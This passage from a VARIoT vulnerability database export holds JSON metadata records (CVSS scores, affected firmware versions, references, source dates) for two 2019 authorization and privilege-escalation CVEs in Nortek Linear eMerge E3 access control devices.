            "vendor": "nortek",
            "version": "\u003c=1.00-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7259",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7259",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2019-34627",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "VHN-158694",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7259",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7259",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34627",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-104",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158694",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158694"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow Authorization Bypass with Information Disclosure. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. An attacker can use the GET request to exploit the vulnerability to bypass authorization, obtain management credentials, log in again with admin permissions, and gain full access to the control interface",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158694"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7259",
            "trust": 3.9
          },
          {
            "db": "PACKETSTORM",
            "id": "155260",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158694",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158694"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "id": "VAR-201907-0160",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158694"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.305000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-200",
            "trust": 1.1
          },
          {
            "problemtype": "Inappropriate authorization (CWE-285) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-285",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158694"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7259"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155260/linear-emerge-e3-1.00-06-privilege-escalation.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158694"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158694"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158694"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          },
          {
            "date": "2019-07-02T18:15:11.940000",
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34627"
          },
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158694"
          },
          {
            "date": "2024-03-07T08:17:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          },
          {
            "date": "2022-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          },
          {
            "date": "2022-10-14T01:13:17.953000",
            "db": "NVD",
            "id": "CVE-2019-7259"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Authorization vulnerabilities in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006011"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-104"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0159

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow Privilege Escalation. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.

    Nortek Security & Control Linear eMerge E3-Series has a permission permission and access control problem vulnerability. An attacker could use this vulnerability to elevate to superuser privileges

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0159",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "\u003c=1.00-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7258",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 6.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7258",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2019-34628",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "VHN-158693",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7258",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7258",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34628",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-105",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158693",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158693"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow Privilege Escalation. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a permission permission and access control problem vulnerability. An attacker could use this vulnerability to elevate to superuser privileges",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158693"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7258",
            "trust": 3.9
          },
          {
            "db": "PACKETSTORM",
            "id": "155260",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158693",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158693"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "id": "VAR-201907-0159",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158693"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.275000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
